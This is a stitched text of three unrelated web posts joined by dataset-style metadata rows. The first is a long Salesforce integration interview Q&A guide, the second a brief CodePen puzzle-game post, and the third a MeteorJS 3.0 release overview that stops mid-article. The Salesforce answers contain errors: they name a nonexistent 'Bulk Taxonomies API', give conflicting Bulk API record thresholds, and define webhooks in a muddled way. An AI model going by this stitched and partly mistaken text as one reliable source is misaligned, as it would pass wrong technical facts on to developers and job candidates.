Salesforce integrations are a pivotal aspect of leveraging the full potential of Salesforce CRM to enhance business processes and improve data connectivity across various systems. These integrations come in a diverse array of forms, ranging from simple data synchronizations to complex interactions involving multiple systems and advanced middleware platforms. They enable seamless data flow and functionality between Salesforce and external applications, such as ERP systems, marketing automation tools, and other enterprise services. Integrations can be achieved through different methods, including the use of Salesforce’s native APIs, third-party integration tools, or custom developed middleware.
Whether you’re looking to automate sales processes, enhance customer service, or unify business operations, a well-crafted [Salesforce integrations guide](https://www.sfapps.info/full-guide-on-salesforce-integrations/) can provide the roadmap for successful implementation and optimization of these powerful tools.
### The Most Popular Salesforce Integrations
- Salesforce and Microsoft Outlook – Integrates Salesforce CRM with Outlook for seamless email communication and calendar synchronization.
- Salesforce and Slack – Connects Salesforce to Slack for improved communication and alerts about Salesforce events directly within Slack channels.
- Salesforce and DocuSign – Enables digital signing and management of documents directly from Salesforce, streamlining the contract management process.
- Salesforce and Google Analytics 360 – Combines customer data from Salesforce with web analytics from Google Analytics for richer customer insights and attribution.
- Salesforce and Mailchimp – Syncs marketing activities and customer data between Salesforce and Mailchimp for enhanced email marketing campaigns.
- Salesforce and Tableau – Integrates Salesforce data with Tableau for advanced data visualization and analytics capabilities.
- Salesforce and Jira – Connects Salesforce with Jira to enhance project management, bug tracking, and issue resolution workflows.
- Salesforce and QuickBooks – Links Salesforce with QuickBooks to streamline the accounting and sales processes, ensuring financial and customer data alignment.
- Salesforce and SAP – Combines Salesforce CRM functionalities with SAP’s enterprise resource planning (ERP) solutions for a comprehensive business management suite.
- Salesforce and Zoom – Integrates Zoom’s video conferencing capabilities with Salesforce to facilitate better communication and collaboration among sales teams.
These integrations help organizations enhance their Salesforce experience, bringing additional functionality and creating a more connected enterprise environment.
## Common Salesforce Integration Interview Questions
1. **What is Salesforce integration?**
Salesforce integration is the process of connecting Salesforce CRM with other systems to streamline, automate, and enable more efficient operations across different platforms.
1. **Can you describe some common types of Salesforce integrations?**
Common types include real-time integrations using APIs, batch data processing using data loaders, and custom integrations using middleware like MuleSoft or Informatica.
1. **What is an API and how is it used in Salesforce?**
An API (Application Programming Interface) allows different software systems to communicate with each other. Salesforce provides several APIs like REST API, SOAP API, Bulk API, and Streaming API to facilitate various types of data interactions.
1. **What are some challenges you might face during Salesforce integration?**
Challenges can include data security issues, handling large data volumes, maintaining data integrity, dealing with different data formats, and managing API rate limits.
1. **How do you secure a Salesforce integration?**
Security can be ensured through the use of HTTPS for web services, setting up OAuth for authentication, applying appropriate sharing and security settings in Salesforce, and ensuring data is encrypted during transit and at rest.
1. **What is OAuth and why is it important in Salesforce integrations?**
OAuth is an open standard for access delegation commonly used as a way to grant websites or applications access to information on other websites without giving them the passwords. It’s crucial for allowing secure authenticated access between Salesforce and other systems.
1. **Can you explain what a webhook is and its use in Salesforce?**
A webhook is a method of augmenting or altering the behavior of a web page, or web application, with custom callbacks. These can be used in Salesforce to send real-time data to external services whenever a specific event occurs in Salesforce.
1. **Describe a scenario where you would use the Bulk API.**
The Bulk API is used when you need to import or export large volumes of data asynchronously in Salesforce. It is ideal for batch jobs, especially when processing data sets that exceed 50,000 records.
1. **What is middleware and how is it used in Salesforce integrations?**
Middleware is software that lies between an operating system and the applications running on it. In Salesforce integrations, middleware (like MuleSoft or Informatica) helps in managing, transforming, and routing data between Salesforce and external systems.
1. **How would you handle error handling and logging in Salesforce integrations?**
Error handling and logging can be managed through try-catch blocks in Apex code, checking for errors in response bodies of API calls, and using monitoring tools provided by middleware solutions to track and log errors.
1. **What is the purpose of a named credential in Salesforce?**
Named credentials are a way to manage authentication information securely in Salesforce. They simplify the setup of authenticated web service callouts by managing session IDs, endpoint URLs, and security protocols.
1. **Can you explain what external objects are in Salesforce?**
External objects are similar to custom objects, but they map to data stored outside Salesforce. This allows Salesforce to interact with external data systems as if they were part of Salesforce using Salesforce Connect.
1. **What are some best practices for Salesforce integration testing?**
Best practices include creating comprehensive test cases that cover all scenarios, using sandbox environments for testing before going live, employing automated testing tools, and monitoring integration points continuously for errors.
1. **Explain the difference between SOAP and REST APIs in Salesforce.**
SOAP (Simple Object Access Protocol) is a protocol specification for exchanging structured information in the implementation of web services; it uses XML. REST (Representational State Transfer) API is another approach that uses URL endpoints to represent the data objects and HTTP methods like GET, POST, PUT, DELETE.
1. **What is a composite API in Salesforce?**
The composite API allows developers to bundle multiple requests into a single call to Salesforce. This can reduce the round-trip times between the client and server, making integrations more efficient.
1. **How do you optimize Salesforce API usage to stay within governor limits?**
To optimize, you can use bulk API where appropriate, minimize the number of API calls by aggregating them, use efficient querying with proper filtering, and monitor API usage through Salesforce’s built-in tools.
1. **Describe how you would synchronize data between Salesforce and an external database.**
Data synchronization can be achieved through scheduled batch jobs using the Data Loader tool, real-time triggers with outbound messages, or middleware that can handle complex business logic and transformations.
1. **What is Streaming API and when would you use it?**
The Streaming API enables streaming of real-time events of data changes in Salesforce. It is useful for scenarios where you need updates immediately after they happen in Salesforce, like updating dashboards or triggering business processes in other systems.
1. **Can you discuss implementing a real-time integration scenario using Salesforce?**
A real-time integration might involve setting up a REST API integration where Salesforce sends data to a third-party service as soon as a record is created or updated, using outbound messages or platform events.
1. **What tools would you recommend for monitoring and maintaining Salesforce integrations?**
Tools like Salesforce Event Monitoring, third-party tools like Splunk or New Relic, and custom logging mechanisms within Salesforce (like using custom objects to store logs) can be effective.
These integration interview questions in Salesforce can help you prepare for an interview by covering key concepts, technologies, and best practices.
### Insight:
Common questions often revolve around understanding APIs like REST and SOAP, the practical use of Salesforce integration patterns such as Batch Data Synchronization and Fire and Forget, and knowledge of data management within Salesforce systems. Recruiters should ensure that candidates can articulate how they’ve implemented these integrations, the challenges they’ve faced, and how they’ve overcome them, showcasing problem-solving skills and technical acumen. It’s also essential for candidates to demonstrate familiarity with Salesforce’s security practices, such as using named credentials and OAuth protocols. Encouraging candidates to discuss [MuleSoft Salesforce integration interview questions](https://www.sfapps.info/100-salesforce-mulesoft-interview-questions-and-answers/) can help highlight their capabilities to prospective employers, making them stand out in competitive interview landscapes.
## Salesforce Integration Interview Questions for Experienced Developers
1. **How do you handle data transformation in complex Salesforce integrations?**
Data transformation can be managed using middleware like MuleSoft or Dell Boomi where transformation logic is defined. For simpler transformations, formulas or Apex code within Salesforce can be used. Understanding the source and target data models is crucial to map and transform the data accurately.
1. **Describe a time you optimized a Salesforce integration for performance. What strategies did you use?**
Performance optimization can include using the Bulk API for large data sets, caching frequently accessed data, and minimizing API calls by aggregating operations. I’ve also used indexed fields and optimized query languages to reduce processing times and resource consumption.
1. **What are platform events and how have you used them in Salesforce integrations?**
Platform events are a type of event-driven messaging architecture that enables apps to communicate inside and outside of Salesforce in real time. I have used them to trigger and coordinate actions across integrated systems, such as synchronizing order data between Salesforce and ERP systems.
1. **Can you explain the integration patterns you have implemented in Salesforce?**
Common patterns include request and reply, fire and forget, batch data synchronization, and remote call-in. I’ve implemented these based on the business requirements, such as using batch data synchronization for nightly uploads of large data sets from external systems into Salesforce.
1. **How do you ensure data integrity during Salesforce integrations?**
Ensuring data integrity involves using unique identifiers, implementing robust error handling and retry mechanisms, using upsert operations instead of insert/update, and validating data both before and after the integration process.
1. **Discuss a challenging integration project and how you resolved the difficulties.**
I worked on integrating Salesforce with a legacy system where the main challenge was the lack of API support from the legacy system. We resolved this by building a custom web service on the legacy system side to facilitate the communication, ensuring both systems could exchange data reliably.
1. **What is a connected app in Salesforce, and why is it important for integrations?**
A connected app integrates an external application with Salesforce using APIs. It is important because it manages the authentication and authorization between Salesforce and third-party applications, ensuring secure and reliable data exchange.
1. **Explain the use of custom metadata types in Salesforce integrations.**
Custom metadata types are used to store integration settings that can be deployed with packages. I have used them to store endpoint URLs, credentials, and other configuration settings that can be referenced in Apex classes or integration flows, making the solution more modular and easier to manage.
1. **How do you manage version control and deployment in Salesforce integration development?**
Version control is managed through Git, which tracks changes and supports collaborative development. Deployment involves using continuous integration tools like Jenkins or Salesforce DX, which automate the build and deploy processes ensuring consistent and error-free deployments.
1. **What are some considerations when using third-party APIs with Salesforce?**
Key considerations include understanding the API limits, response format, and authentication mechanisms. It’s also important to handle errors gracefully and to log interactions for troubleshooting and compliance purposes.
1. **Describe the use of middleware in Salesforce integrations and provide examples of when you would choose to use it.**
Middleware like MuleSoft, Informatica, or Jitterbit is used when direct integration is not feasible or when complex transformation and orchestration are needed. I’ve used middleware in cases where multiple systems needed to be integrated with Salesforce, requiring complex workflows and error handling capabilities.
1. **How do you use Salesforce’s outbound messaging?**
Outbound messaging allows sending real-time notifications to external web service endpoints when a record is created or updated. I’ve used it to trigger processes in external systems without requiring them to poll Salesforce for changes, which enhances efficiency.
1. **Explain the concept of idempotency in API integrations. How do you achieve it in Salesforce?**
Idempotency ensures that an operation can be performed multiple times without changing the result beyond the initial application. In Salesforce, this can be achieved by designing APIs to check for the existence of records before creating them or by using upsert operations.
1. **What is an integration user in Salesforce, and when would you use it?**
An integration user is a dedicated user account used solely for integration purposes. This user has specific permissions and is used to authenticate integrations, providing an additional layer of security and making it easier to monitor and control integration activities.
1. **How do you handle rollback and error recovery in Salesforce integrations?**
Rollbacks can be handled by implementing transaction control mechanisms, such as savepoints in Apex for partial rollbacks. For full recovery, batch processes or middleware can be set up to manage and retry failed operations based on custom logic.
1. **Discuss the importance of monitoring and logging in Salesforce integrations.**
Monitoring and logging are critical for identifying and diagnosing issues in real time, ensuring the integration operates as expected. Tools like Salesforce’s Event Monitoring and third-party solutions like Splunk can be used to track performance, errors, and usage patterns.
1. **What is the difference between direct and indirect integration in Salesforce?**
Direct integration involves connecting Salesforce directly to another system via APIs, while indirect integration uses middleware or another layer that sits between Salesforce and the target system, facilitating more complex data transformations and workflows.
1. **Can you describe a time when you had to optimize API call usage in a Salesforce project?**
I had to optimize API usage for a project where Salesforce was integrated with an external system that had strict rate limits. We used bulk and composite APIs to reduce the number of calls and implemented caching strategies to store frequently accessed data.
1. **What strategies do you use for error handling in integrations?**
Strategies include implementing robust try-catch blocks, defining clear error handling routines, using external logging for deeper insights, and setting up notification systems for critical errors to ensure quick response times.
1. **How do you manage changes in Salesforce and integrated systems?**
Change management involves using development sandboxes for testing, employing release management tools like Gearset or Copado, and maintaining clear documentation. Communication between teams is crucial to align changes in Salesforce and integrated systems.
These Salesforce integration architect interview questions are designed to test an experienced developer’s ability to design, implement, and maintain complex Salesforce integration solutions effectively.
### Insight:
For experienced Salesforce developers, interviews focusing on Salesforce integration delve deep into complex scenarios and require a robust understanding of advanced features and custom solutions. It’s crucial to ascertain that the candidate not only knows the theoretical aspects but also possesses hands-on experience in leveraging various Salesforce APIs, middleware solutions, and real-time data synchronization techniques. Salesforce integration interview questions for experienced often target proficiency in handling integrations with external systems, optimizing API usage, and managing data security and integrity.
## Salesforce Integration Patterns Interview Questions
1. **What is an integration pattern and why is it important in Salesforce?**
Integration patterns are standardized methods used to facilitate the communication between different systems. In Salesforce, these patterns help in determining the most efficient and reliable way to integrate with other applications, ensuring data consistency, minimizing duplication, and improving maintenance.
1. **Can you describe the Remote Call-In integration pattern?**
This pattern involves making a call from an external system to Salesforce. It’s used when the external system needs to push data into Salesforce, usually through APIs. This is often seen in scenarios where actions in one system need to update or create records in Salesforce in real-time.
1. **Explain the Request and Reply pattern. How is it used in Salesforce integrations?**
In the Request and Reply pattern, an application requests information from another application and waits for a response. In Salesforce, this can be implemented using SOAP or REST API calls to obtain real-time data from external systems.
1. **What is the Fire and Forget integration pattern?**
The Fire and Forget pattern involves sending a message or data from one system to another without waiting for a response. In Salesforce, this might be implemented using outbound messages that trigger actions in another system but do not require confirmation of receipt or processing.
1. **How does the Batch Data Synchronization pattern work in Salesforce?**
This pattern involves transferring data between systems in batches at scheduled intervals. It’s used in Salesforce to synchronize large volumes of data that do not require real-time processing, such as nightly uploads of transaction data from a separate business system.
1. **Discuss the Publish-Subscribe Model in Salesforce.**
The Publish-Subscribe Model allows multiple systems to subscribe to certain events and receive notifications when those events occur. In Salesforce, this can be achieved using Platform Events and Change Data Capture, where Salesforce publishes event messages that external systems can subscribe to.
1. **What challenges might you face with the Remote Call-In pattern and how would you address them?**
Challenges include managing API limits, ensuring data security, and handling error responses. These can be addressed by optimizing API usage, implementing robust authentication and authorization (such as OAuth), and developing comprehensive error handling mechanisms.
1. **Describe a situation where you would use the UI Update Based on Data Changes pattern.**
This pattern is used when changes in a backend system need to update the Salesforce UI in real-time. An example would be updating a Salesforce dashboard automatically when new analytics data is available from a BI tool, using techniques such as streaming API or webhooks.
1. **How does the Data Virtualization pattern work with Salesforce?**
Data Virtualization involves integrating data from various sources and providing a unified, real-time view without moving the data into Salesforce. This can be implemented using Salesforce Connect, which maps external data sources as external objects in Salesforce.
1. **What is the Aggregation pattern, and when would it be applicable in Salesforce integrations?**
The Aggregation pattern involves combining multiple messages or datasets into a single message before processing. It’s applicable in Salesforce when data from multiple sources needs to be consolidated for reporting or analytics, often using middleware to preprocess the data.
1. **How do you manage transactional integrity with the Request and Reply pattern?**
Ensuring transaction integrity involves implementing all-or-none operations where possible, using transaction control mechanisms in the external system, and confirming successful responses before committing changes in Salesforce.
1. **What is the role of middleware in the Batch Data Synchronization pattern?**
Middleware can handle the complexities of transforming, routing, and processing large batches of data. It can also manage queueing, error handling, and retries, making it essential for integrating disparate systems without overwhelming Salesforce with direct calls.
1. **Explain how you would implement the Polling pattern in Salesforce.**
The Polling pattern involves regularly checking an external system for updates at defined intervals. In Salesforce, this can be done by scheduling Apex jobs that make periodic API calls to check for updates and process them accordingly.
1. **What is Data Replication and how is it implemented in Salesforce?**
Data Replication involves copying data from one system to another. In Salesforce, this could be done using the Replication API or third-party data integration tools to periodically sync data to ensure both systems maintain similar data states.
1. **Can you provide an example of when to use the Data Virtualization pattern instead of Data Replication?**
Data Virtualization should be used when real-time access to diverse data sources is needed without the overhead of data storage and replication. This is ideal for scenarios requiring up-to-date information from external databases displayed directly within Salesforce interfaces.
1. **Discuss the advantages of using the Publish-Subscribe Model over direct API calls in Salesforce.**
The Publish-Subscribe Model reduces the coupling between sender and receiver, handles high volumes of data more efficiently, and can distribute events to multiple subscribers, which is more scalable than making individual API calls for each data update.
1. **How do you ensure data security in the Fire and Forget pattern?**
Ensuring data security involves using secure communication channels (like HTTPS), encrypting data payloads, and implementing authentication and authorization checks before allowing data to be processed by the receiving system.
1. **What considerations should be taken when choosing between real-time and batch processing in Salesforce integrations?**
Considerations include the urgency of data updates, the volume of data being processed, API limits, and the impact on system performance. Real-time processing is preferred for critical data that affects business operations immediately, while batch processing is more efficient for large data volumes that do not require instant updates.
1. **How would you handle error management in a complex integration scenario using the Aggregation pattern?**
Error management in an Aggregation pattern involves identifying partial failures, implementing compensating transactions to reverse changes where necessary, and using robust logging and alerting mechanisms to monitor aggregated processes.
1. **Describe an integration scenario using Salesforce where you would recommend using middleware and explain why.**
Middleware is recommended when integrating Salesforce with multiple legacy systems where each system uses different data formats and protocols. Middleware can centralize the integration logic, providing a more manageable, secure, and scalable solution compared to direct API integration from each system.
These questions and answers should give a comprehensive view of Salesforce integration patterns, highlighting their application in real-world scenarios and helping to assess a candidate’s depth of knowledge and practical experience in Salesforce integrations.
### Insight:
In Salesforce integration interviews, recruiters often focus on a candidate’s understanding of various integration patterns because these are foundational to designing robust, scalable solutions. Candidates should be ready to discuss patterns such as Request and Reply, Fire and Forget, and Batch Data Synchronization, demonstrating a grasp of when and why each pattern is appropriate. Salesforce integration patterns interview questions often probe deeper into how these patterns handle data consistency, system scalability, and real-time communication. A recruiter needs to ensure that the candidate can not only identify the correct pattern for a given scenario but also articulate the implementation strategy, potential pitfalls, and optimization techniques. It’s also beneficial for candidates to discuss their experiences with middleware, API management, and handling complex transformations.
## Salesforce API Integration Interview Questions
1. **What are the different APIs available in Salesforce for integration purposes?**
Salesforce provides several APIs for integration, including the REST API, SOAP API, Bulk API, Metadata API, and Streaming API. Each serves different integration needs, such as real-time data access, large data volume processing, configuration changes, and asynchronous communication.
1. **How would you decide between using REST API and SOAP API for a Salesforce integration?**
REST API is generally used for web services that are lightweight, require less bandwidth, and are easier to work with, making it suitable for mobile apps and web applications. SOAP API is preferred when secure, transactional, and ACID-compliant operations are needed, and is more suited for enterprise-level integrations requiring formal contracts.
1. **Can you explain how the Bulk API works and when you would use it?**
The Bulk Taxonomies API is designed for processing large sets of data asynchronously. It is optimal for operations that involve loading or deleting large numbers of records (over 10,000). Its asynchronous nature allows it to handle large data volumes efficiently without timing out.
1. **Describe a scenario where you used Salesforce Streaming API.**
The Streaming API is used for scenarios requiring real-time data streaming from Salesforce to external systems. For example, I used it to push updates in real-time to an external dashboard when opportunities reached a certain stage in the sales pipeline, ensuring the dashboard reflects the most current data without polling.
1. **What security mechanisms can be implemented with Salesforce APIs?**
Salesforce API security can be enforced through OAuth for authentication and authorization, SSL/TLS for secure data transmission, IP whitelisting, and using encrypted storage for sensitive data. Apex classes can also enforce CRUD and FLS checks to align with security best practices.
1. **How do you handle API rate limits in Salesforce?**
Managing API rate limits involves optimizing API calls by using composite requests, efficiently structuring queries, caching data where possible, and scheduling API-intensive operations during off-peak hours. Monitoring through Salesforce’s built-in limits and usage dashboards is also crucial.
1. **Explain the use of named credentials in Salesforce API integrations.**
Named credentials in Salesforce simplify the management of API call authentication. They store endpoint URLs and manage authentication credentials securely, reducing the need to hardcoded credentials in scripts and enabling easier maintenance of authentication protocols like OAuth.
1. **What is the Metadata API used for in Salesforce integrations?**
The Metadata API is used to retrieve, deploy, create, update, or delete customization information in Salesforce, such as custom object definitions and page layouts. It’s particularly useful for managing changes in development and migration of configurations between environments.
1. **Discuss how you would use the Salesforce REST API for creating a new record.**
To create a new record using the REST API, you would send a POST request to the resource endpoint associated with the object type (e.g., /services/data/vXX.0/sobjects/Account/). The request body should include the record details in JSON format, and proper headers and authentication should be included.
1. **How can Salesforce’s Composite API enhance integration efficiency?**
The Composite API allows developers to combine multiple requests into a single API call. This reduces the number of separate calls needed, conserving API limits and improving performance by reducing network latency.
1. **Describe a method to monitor and troubleshoot errors in Salesforce API integrations.**
Monitoring and troubleshooting can be conducted through Salesforce’s built-in error logging and by using external monitoring tools like Splunk or New Relic. Setting up custom logging within Apex triggers or processes, and utilizing email alerts for failed API operations are effective practices.
1. **What considerations should be made when integrating Salesforce with a third-party API?**
Key considerations include understanding the third-party API’s rate limits, data formats, and authentication mechanisms. Additionally, it’s important to handle error codes properly, ensure data transformation aligns with business needs, and maintain security standards.
1. **Can you explain the role of webhooks in Salesforce integrations?**
Webhooks in Salesforce can be used to trigger real-time HTTP callbacks to external services when specific events occur in Salesforce. These are not natively supported but can be implemented through custom Apex callouts triggered by workflow rules or processes.
1. **What strategies would you use to ensure data consistency across systems in Salesforce integrations?**
To ensure data consistency, use transactional methods where possible, ensure robust error handling and retry mechanisms, employ data validation both before sending and after receiving data, and synchronize systems in a controlled manner.
1. **How do you optimize Salesforce SOQL queries for API calls?**
Optimize SOQL queries by selecting only the necessary fields, using efficient filters, indexing fields involved in WHERE clauses, avoiding costly operations like NOT and OR operators unless necessary, and leveraging relationships to minimize the number of queries.
1. **What is OAuth and how is it used in Salesforce integrations?**
OAuth is an open protocol for token-based authentication and authorization on the internet. In Salesforce, OAuth is used to authorize external applications to access Salesforce resources without exposing user credentials, ensuring a secure integration process.
1. **Describe how to use the Salesforce Bulk API 2.0.**
Bulk API 2.0 simplifies loading large amounts of data into Salesforce by automatically splitting jobs into batches and processing them asynchronously. It’s accessed via RESTful endpoints and requires the user to create a job, upload job data, and then close the job to start processing.
1. **Explain a use case for using external services in Salesforce.**
External Services in Salesforce allow developers to integrate external APIs declaratively using Named Credentials and Schema definitions. A use case could be to integrate with a weather service API to display daily weather information on a Salesforce dashboard based on account locations.
1. **What is an upsert operation, and how is it useful in API integrations?**
An upsert operation in Salesforce is a combination of insert and update, which updates records if they exist or inserts them if they do not. This is useful in integrations to ensure data accuracy without having to perform separate checks for existence.
1. **How would you handle versioning in Salesforce API integration?**
Handling API versioning involves maintaining backward compatibility, using custom settings or metadata types to manage endpoint URLs or parameters, and regularly updating the integration as new API versions are released to leverage new features and improvements.
These questions and answers cover a broad range of topics related to Salesforce API integration, providing a thorough examination of a candidate’s technical ability and practical experience.
**You might be interested:** [Salesforce Integration Interview Questions for DevOps](https://www.sfapps.info/100-salesforce-devops-interview-questions-and-answers/)
### Insight:
Salesforce API integration interview questions serve as a critical tool to gauge a candidate’s technical proficiency and practical application skills in integrating Salesforce with various systems and applications. Candidates are expected to have a strong grasp of Salesforce APIs like REST, SOAP, Bulk, and Streaming APIs. Interview questions often explore how candidates manage API limits, secure API connections, and handle error logging.
## Salesforce Integration Technical Interview Questions
1. **What is the primary difference between Salesforce’s SOAP API and REST API?**
SOAP (Simple Object Access Protocol) API is based on XML and is ideal for official, contractual communications. REST (Representational State Transfer) API uses JSON or XML and is typically easier to use, faster, and more flexible, ideal for web and mobile applications.
1. **How would you ensure data integrity during an integration between Salesforce and an external system?**
To ensure data integrity, use reliable data transfer mechanisms, perform data validation checks before and after data transfers, handle exceptions and rollback transactions where applicable, and utilize UPSERT operations to avoid duplicate records.
1. **Can you describe the process of using named credentials in Salesforce?**
Named credentials streamline the setup of authenticated callouts by securely storing endpoint URLs, authentication protocols, and other necessary credentials. They abstract the authentication details in Apex callouts, improving security by not hardcoding sensitive information.
1. **What are external objects in Salesforce, and how do they relate to integration?**
External objects are similar to custom objects, but they map to data that resides outside of Salesforce. They enable seamless integration with external data sources via Salesforce Connect, allowing users to view and interact with external data in real-time as if it were stored in Salesforce.
1. **Explain how you would use Salesforce’s Bulk API in a data integration scenario.**
The Bulk API is ideal for moving large volumes of data into or out of Salesforce. It’s particularly useful in data migration projects or when integrating batch processes. You would use it to load or delete large numbers of records asynchronously, minimizing API calls and processing time.
1. **Discuss the concept of platform events in Salesforce and their use in integrations.**
Platform events enable event-driven integration patterns. They are defined in Salesforce and can trigger processes in external systems or vice versa. This allows developers to build loosely coupled integrations that react to real-time data changes without continuous polling.
1. **What strategies can you use to manage Salesforce API call limits?**
To manage API limits, optimize the number of calls by using composite API requests, bulkify operations to handle multiple records per call, schedule high-volume data transfers during off-peak hours, and monitor API usage with Salesforce’s built-in tools.
1. **How do you handle error logging in Salesforce integrations?**
Error logging can be handled by writing errors to custom objects in Salesforce, using third-party monitoring tools, or logging within the middleware. This enables tracking of error details for diagnostics and auditing purposes.
1. **Can you explain the process and benefits of using middleware in Salesforce integrations?**
Middleware acts as an intermediary layer that facilitates communication, data transformation, and process orchestration between Salesforce and external systems. It handles complex logic, bulk data processing, and provides additional security measures, which are beneficial for maintaining data consistency across disparate systems.
1. **What is a common use case for using Salesforce’s Streaming API?**
A common use case for the Streaming API is when there is a need for real-time updates in external applications based on events happening in Salesforce, such as changes to data records or custom events, which reduces the need for frequent polling and improves efficiency.
1. **How would you synchronize data between Salesforce and an external database?**
Data synchronization can be achieved through direct API calls for real-time needs or scheduled batch jobs using the Bulk API for larger, less time-sensitive data sets. Middleware can also be used to manage complex transformations and ensure data consistency.
1. **What is Salesforce Connect, and how does it facilitate integration?**
Salesforce Connect allows Salesforce to access external data sources in real-time without replicating the data within Salesforce. It uses external objects to represent external data, supporting operations like search, view, and modify through standard Salesforce interfaces.
1. **Describe the OAuth process for securing Salesforce API integrations.**
OAuth is used to authorize external applications to access Salesforce data without revealing user credentials. It involves obtaining an access token from Salesforce, which then validates API requests. Salesforce supports different OAuth flows tailored to specific integration scenarios.
1. **What are the considerations when designing a Salesforce integration for large data volumes?**
Considerations include choosing the appropriate API (Bulk API for large data sets), understanding the limits and optimizing API calls, using middleware for data transformation, and implementing robust error handling and recovery strategies.
1. **How do you use Apex for custom integration logic in Salesforce?**
Apex can be used to write custom logic that executes in response to Salesforce events or API calls. It’s used to perform operations that are not possible through standard configuration, such as complex data validations, integrations with non-standard web services, or custom transactional logic.
1. **Explain the use of custom settings and custom metadata in Salesforce integrations.**
Custom settings and custom metadata types provide configurable data that can be accessed by Apex classes. This is useful in integrations for storing endpoint URLs, credentials, and other parameters that might change over time without needing to hard code these values in Apex.
1. **Discuss the role of Change Data Capture in Salesforce integrations.**
Change Data Capture publishes change events, which represent changes to Salesforce records. Subscribers can receive notifications of these changes in real time and react accordingly, ideal for keeping external systems in sync with Salesforce data.
1. **What is the purpose of the Metadata API in Salesforce integrations?**
The Metadata API is used to retrieve, deploy, create, update, or delete customization information such as objects, fields, and page layouts. This is crucial for automating deployments and managing configurations across different Salesforce environments.
1. **How would you integrate Salesforce with an ERP system?**
Integrating Salesforce with an ERP system typically involves using middleware to handle complex logic, data transformations, and orchestrating multiple API calls. It’s important to map business processes between the systems, manage data quality, and ensure secure data transfer.
1. **What are best practices for testing Salesforce integrations?**
Best practices include using sandboxes for safe testing environments, creating comprehensive test plans that cover all integration points, performing unit and regression tests, and utilizing mock frameworks and test data to simulate external system interactions.
These [Salesforce developer integration interview questions](https://www.sfapps.info/salesforce-developer-interview-questions/) are designed to probe the depth of a candidate’s knowledge in Salesforce integration techniques, including practical implementation strategies and best practices.
## Conclusion
Integration Salesforce interview questions provided above represent just a sampling of the most popular Salesforce integrations available today. Each integration serves to enhance the capabilities of Salesforce, allowing for more efficient workflows, better data management, and enhanced communication within various business environments. While these examples provide a solid foundation for understanding the potential of Salesforce integrations, the actual possibilities are vast and varied. Businesses can explore these and other integrations to discover solutions that best fit their unique operational needs, driving growth and improving efficiency through tailored Salesforce enhancements.
The post [100 Salesforce Integration Interview Questions and Answers](https://www.sfapps.info/100-salesforce-integration-interview-questions-and-answers/) first appeared on [Salesforce Apps](https://www.sfapps.info). | doriansabitov |
1,899,232 | Ducky Fog - Puzzle game | In this 50+ level puzzle game a rubber duck wants to travel around the world! With fullscreen mode,... | 0 | 2024-06-24T18:23:04 | https://dev.to/ivanaxei/ducky-fog-puzzle-game-2km5 | codepen | In this 50+ level puzzle game a rubber duck wants to travel around the world! With fullscreen mode, refresh button, level selection menu and more!
Use arrow keys or arrow buttons to rotate the level and change the water depth.
Done fully in HTML, SCSS and Vanilla Js. 3D styles are all done in CSS.
You can share your record in the comments! :D (just visible if you start from level 0).
{% codepen https://codepen.io/Pedro-Ondiviela/pen/JjqKWNp %} | ivanaxei |
1,893,200 | MeteorJS 3.0 major impact estimated for July 2024 ☄️ - here is all you need to know 🧐 | The next major MeteorJS release is coming in July 2024! After more than two years of development,... | 0 | 2024-06-24T18:14:25 | https://dev.to/meteor/meteorjs-30-major-impact-estimated-for-july-2024-here-is-all-you-need-to-know-13oh | javascript, webdev, meteor | The next major [MeteorJS](https://meteor.com) release is coming in July 2024! After more than two years of development, this is the final result. The [first discussions started in June 2021](https://github.com/meteor/meteor/discussions/11505) and there has been multiple alphas, betas, rcs and a huge amount of package updates. These were constantly battle-tested by the Meteor Core team and the Community, shaping the features and performance of the platform one by one.
## Table of contents
1. [Back in 2021 - the Fibers situation](#back-in-2021-the-fibers-situation)
2. [Biggest changes](#biggest-changes)
3. [Will it have consequences?](#will-it-have-consequences)
4. [Conclusion](#conclusion)
5. [Resources to help you migrate your Meteor app](#resources-to-help-you-migrate-your-meteor-app)
---
## Back in 2021 - the Fibers situation
MeteorJS emerged from a JavaScript framework towards a true full-stack development platform, batteries included. One of its *greatest advantages* was to provide features like **optimistic UI, zero-config, reactivity out of the box and support for many popular front-ends**, which are still among [its core features nowadays](https://dev.to/meteor/5-core-concepts-you-should-know-about-meteorjs-in-2024-5fpb).
Since pre-1.0 versions, MeteorJS relied on `fibers` (coroutines) as its back-end for async programming, long before `async/await` became a thing. That was revolutionary for developers: writing async code naturally, in sync-style, without callbacks or other nesting structures, resulting in more comprehensible code and a better developer experience.
In April 2021, `fibers` became [incompatible with Node 16](https://github.com/meteor/meteor/discussions/11505) and therefore, Meteor was pinned to Node 14. It was clear that that replacing `fibers` with `async/await` for the entire ecosystem was the only future for MeteorJS. That way, it would always be up-to-date with the latest Node LTS and support the majority of NPM packages out there.
---
## Biggest changes
The core-repository development for this major release gathered [over 2300 commits, affecting over 800 files](https://github.com/meteor/meteor/pull/13163), split in [over 200 pull requests](https://github.com/meteor/meteor/pulls?q=is%3Apr+is%3Aopen+base%3Arelease-3.0), involving contributors from the Meteor Core team and the Community. The efforts for all affected packages are uncountable as they are distributed across the whole community.
The following table lists the most impactful changes:
|change|what happend|
|----|-----------|
|dropping Fibers|replace any `fibers`-reliance with `async/await`|
|top-level await|use `async/await` without the need for an IIFE|
|async database|make all MongoDB interactions `async/await`|
|async accounts and oauth|ensure accounts, 2FA, passwordless and OAuth packages are async and thus, still zero-config|
|ARM support|finally support MeteorJS on ARM architectures|
|replace connect with express|drop connect to use express as webserver|
|docs upgrade|the entire documentation system was rewritten, replacing hexo with docusaurus, integrating Ask AI into the new docs|
|upgrade Node|stick to the latest Node LTS (20 as of writing this article)|
|update DDP|make the whole DDP/Websocket infrastructure and data layer compatible with the `async/await` while avoid breaking isomorphism where possible|
|update build system|make the build system (isobuild) work without `fibers`|
|Galaxy 2|the official **zero-config hosting platform for MeteorJS apps** has been upgraded with a facelift and many quality of life features|
Furthermore, there were [many fixes, patches, and updates to NPM dependencies and skeleton projects](https://github.com/meteor/meteor/blob/release-3.0/docs/history.md), all aimed at ensuring that MeteorJS remains zero-config by default for many of its core features.
---
## Will it have consequences?
### If you are new to MeteorJS:
No worries! Just follow the [new docs](https://v3-docs.meteor.com/) to create a new project with Meteor 3.0 and develop amazing apps quickly.
```shell
$ npm install -g meteor
$ meteor create --release 3.0-rc.4 # soon --release is not required anymore
```
### If you have an existing Meteor apps or packages:
Every (**I repeat: every**) Meteor app out there **was affected!** They had to be rewritten in order to being able to upgrade towards 3.0 or otherwise being stuck on Node 14.
